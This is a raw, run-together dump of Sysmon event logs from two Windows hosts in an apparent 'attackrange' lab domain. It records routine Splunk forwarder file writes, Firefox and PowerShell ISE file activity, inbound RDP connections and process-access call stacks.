Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=DE62F2C0D2ACFE33ABE86A001DE57EC9,SHA256=489551DF135C12EB6209DC85E060D698EBD0D9830BABA8A27534D5A407739075,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049885Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:57.805{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla 
Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=FE2D65BFE88DD859AE14DE245ED5D135,SHA256=152F838A1FC893B7BA2FCEE50E648569190FFC83E8C999EC86020B38262B25E0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049884Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:57.336{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=05C07E0F31528CF95E1ED179F763BFF1,SHA256=D218906BF19F3269B2FAFAADE9F82FEED765996270714398820B9DF1E5EB9DF1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049883Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:57.037{466BC892-02BC-60E8-2A00-00000000CF01}2928NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=DD4D1D185AB4AED8A391DDEB7814ED87,SHA256=CA570F672172721E4189F1D4FCAE899B45A155271730C13B6A88FE6BC47AB312,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808037Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:54:58.944{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8234F99BB0F81EA6B5B4561AF2B9F6DA,SHA256=7527B754811AA4EC9B2DCD2FC2BF12BE8744C23849C7E4BEE755A4C282548849,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049897Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:58.351{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program 
Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2828A9502C973FA634952D05C300D7C9,SHA256=C8DF22E9F4F5059987285B24482C5DF2CB2CD88327C2396BAE50C20A56EE1791,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049896Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:58.151{466BC892-5A42-60E8-C510-00000000CF01}7816ATTACKRANGE\bobC:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exeC:\Users\bob\AppData\Local\Microsoft_Corporation\powershell_ise.exe_StrongName_lw2v2vm3wmtzzpebq33gybmeoxukb04w\3.0.0.0\AutoSaveInformation\7816.xml~RFf6bc67e.TMPMD5=4553D3891EC8198EC956E59A7FA89664,SHA256=7DA31B28073EC76DCCA7EDFC3709014058FE36DCB6626D30538493EE344D57A6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808038Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:54:59.944{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C18270EF8077FB5A63FF202165F354C3,SHA256=728C94355C54E3F535759AC623C62F627070A7A4D4E1CEA3185423BA9AB3256E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049899Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:59.353{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AB9B0BB6355740ED8DE9EF707EA27B89,SHA256=571745377536B863D68B01109BF15644F8CB556880DCFEEA9285542DFC48AA14,IMPHASH=00000000000000000000000000000000falsetrue 
354300x80000000000000001049898Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:50.561{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local51065-false10.0.1.12-8089- 23542300x8000000000000000808042Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:55:00.944{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E1AE9D07FCAE8E5D941F428F41E9227D,SHA256=DA08381FC892A5515F4ED2AD388CB644058EC4BAFB8CA24FBB51030C6698A9C1,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001049906Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:52.728{466BC892-02AD-60E8-0B00-00000000CF01}624C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsefalse10.0.1.15ip-10-0-1-15.eu-central-1.compute.internal57299-false10.0.1.14win-dc-890.attackrange.local49676- 10341000x80000000000000001049905Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:00.653{466BC892-3462-60E8-100C-00000000CF01}89449164C:\Program Files\Mozilla 
Firefox\firefox.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\windows.storage.dll+1549f7|C:\Windows\System32\windows.storage.dll+154323|C:\Windows\System32\windows.storage.dll+1541a9|C:\Windows\System32\windows.storage.dll+27be5|C:\Windows\System32\windows.storage.dll+27b2d|C:\Windows\System32\windows.storage.dll+26076|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+61c3f|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+5e336|C:\Windows\System32\combase.dll+5daea|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c 10341000x80000000000000001049904Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:00.653{466BC892-3462-60E8-100C-00000000CF01}89449164C:\Program Files\Mozilla 
Firefox\firefox.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\windows.storage.dll+154962|C:\Windows\System32\windows.storage.dll+154323|C:\Windows\System32\windows.storage.dll+1541a9|C:\Windows\System32\windows.storage.dll+27be5|C:\Windows\System32\windows.storage.dll+27b2d|C:\Windows\System32\windows.storage.dll+26076|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+61c3f|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+5e336|C:\Windows\System32\combase.dll+5daea|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c 10341000x80000000000000001049903Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:00.653{466BC892-3462-60E8-100C-00000000CF01}89449164C:\Program Files\Mozilla 
Firefox\firefox.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6482|C:\Windows\System32\shcore.dll+617d|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\windows.storage.dll+154947|C:\Windows\System32\windows.storage.dll+154323|C:\Windows\System32\windows.storage.dll+1541a9|C:\Windows\System32\windows.storage.dll+27be5|C:\Windows\System32\windows.storage.dll+27b2d|C:\Windows\System32\windows.storage.dll+26076|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+61c3f|C:\Windows\System32\combase.dll+60c3f 10341000x80000000000000001049902Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:00.653{466BC892-3462-60E8-100C-00000000CF01}89449164C:\Program Files\Mozilla 
Firefox\firefox.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6154|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\windows.storage.dll+154947|C:\Windows\System32\windows.storage.dll+154323|C:\Windows\System32\windows.storage.dll+1541a9|C:\Windows\System32\windows.storage.dll+27be5|C:\Windows\System32\windows.storage.dll+27b2d|C:\Windows\System32\windows.storage.dll+26076|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+61c3f|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+5e336 23542300x80000000000000001049901Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:00.653{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\6824f4a902c78fbd.customDestinations-ms~RFf6bd042.TMPMD5=FEEDDF0B48ACBAE2DF2C13E094BA61E1,SHA256=564E4AC53FEF38F8EC2ADC3773CA3AE2E546D9CF626CDED40CA8B8DCCA4D789B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049900Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:00.353{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8F8B7C7981A41553E667229BC855F07F,SHA256=52B397C3712102B4D9764F20A37A6CC1EE1FCF45E251D0C53B72B5BEF1BE2EEA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808041Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:55:00.194{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=9217A22E84A9FC901D826348FED3EA98,SHA256=6B572022D0EAD435E0C1CBAB5E938E7F23380B1FC12BAC3DDBEDF32C4702049C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808040Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:55:00.194{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=431EED760382CD39F5766B2D889044D8,SHA256=4BB80BDEC6C930DD103AA39D55555F51B40D575B14044E27C63A03968E80A9B6,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000808039Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:54:59.039{0C1E0330-0490-60E8-0F00-00000000D001}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse181.214.206.155-7849-false10.0.1.15win-host-623.attackrange.local3389ms-wbt-server 23542300x8000000000000000808043Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:55:01.944{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=142AA9A44FF9F87720FC34C22B55E2A2,SHA256=929BDB023ACA5934873E5F9386906CC037119F53A79292D4398CC06F0E4D4FFA,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001049908Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:53.746{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local51066-false10.0.1.12-8000- 23542300x80000000000000001049907Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:01.354{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=80AA1A08B7BDA7BAB5158B0FEDE90FAF,SHA256=77D9CAB92EFAD761C1FFF5A19F9B3BCB0B9341DAC0343BD578F87A9C6244F73E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808046Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:55:02.944{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A26A33BE965D5FFB26EE9883EB06E6B5,SHA256=9FB727D7978E793B0260AB8961583A58A2D423B0F926C34A47B6F23F54A7BE96,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049909Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:02.391{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BE147FEF02ECCE36FB58AAE72C2E2DDB,SHA256=B72EC90B28DAC00E8DF44FD89F225DBE915274850852220C711557708C38B83A,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000808045Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:54:59.405{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57300-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 354300x8000000000000000808044Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:54:59.337{0C1E0330-048F-60E8-0B00-00000000D001}628C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57299-false10.0.1.14ip-10-0-1-14.eu-central-1.compute.internal49676- 23542300x8000000000000000808047Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:55:03.960{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=28BB8C7EB70AE960E3094B00CC46E82B,SHA256=EE1F9243AA75037CDE056842A71E1DDE9C81DE0372DAB08C0FAB899273EE6612,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049912Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:03.406{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E0B00EE9F3F9DE1BDD599E6510B805CD,SHA256=FBF63C826554F91A2C1496BF61F34CF3F9B411D328602C31166B572FB22CFA4B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049911Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:03.206{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=2461D2806B0B35F67086AAC98A80F36D,SHA256=E8F571BA9ECBE5E01B5874B7D3ECC0A5E43729E880CEC7D3E5F62A0FBCC3DAE8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049910Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:03.206{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=92093596AEBC4A8D2BEC5B9C2707CAD1,SHA256=18D52EBDD552836135544D6DDC83A4F71BFA23D439CA7BBA72AE2E78CECC6565,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808048Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:55:04.960{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B27AD452DFFCE70AE6446F834F42C28C,SHA256=6581C2ECC380D142804E79E7351B08ACECF31C2AAC36E677B217B75F6607268C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049914Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:04.420{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program 
Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4083392507F97D51D8918FAFCC832CC7,SHA256=289B2F8DFC57B11633ED3B1308C82EE03F5FB761EB676FA0160E3855F5F377BC,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001049913Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:55.456{466BC892-02AF-60E8-0F00-00000000CF01}360C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse195.78.54.188-51646-false10.0.1.14win-dc-890.attackrange.local3389ms-wbt-server 23542300x80000000000000001049950Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:05.936{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E4AFEA57EE4DA082C59EC61C0A184B43,SHA256=1544F9EFBE5F27C68699E33FA4C035CCA9C58912A540255E3808765D145C5EC9,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001049949Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:55:05.906{466BC892-32D3-60E8-6F0B-00000000CF01}70763308C:\Windows\System32\RuntimeBroker.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41968|C:\Windows\system32\windows.cortana.Desktop.dll+16557|C:\Windows\system32\windows.cortana.Desktop.dll+12d9b|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+aeb5a|C:\Windows\System32\combase.dll+a592d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+65213|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d 10341000x80000000000000001049948Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:55:05.906{466BC892-32D3-60E8-6F0B-00000000CF01}70763308C:\Windows\System32\RuntimeBroker.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41680|C:\Windows\system32\windows.cortana.Desktop.dll+92dc|C:\Windows\system32\windows.cortana.Desktop.dll+12d31|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+aeb5a|C:\Windows\System32\combase.dll+a592d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+65213|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d 10341000x80000000000000001049947Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:55:05.906{466BC892-32D3-60E8-770B-00000000CF01}63567400C:\Windows\Explorer.EXE{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+109146|C:\Windows\System32\TwinUI.dll+82a97|C:\Windows\System32\TwinUI.dll+beade|C:\Windows\System32\TwinUI.dll+beaa9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049946Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:05.906{466BC892-32D3-60E8-770B-00000000CF01}63567400C:\Windows\Explorer.EXE{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+109146|C:\Windows\System32\TwinUI.dll+82a97|C:\Windows\System32\TwinUI.dll+beade|C:\Windows\System32\TwinUI.dll+beaa9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049945Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:55:05.873{466BC892-32D3-60E8-6F0B-00000000CF01}70763308C:\Windows\System32\RuntimeBroker.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\System32\execmodelclient.dll+8e62|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 10341000x80000000000000001049944Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
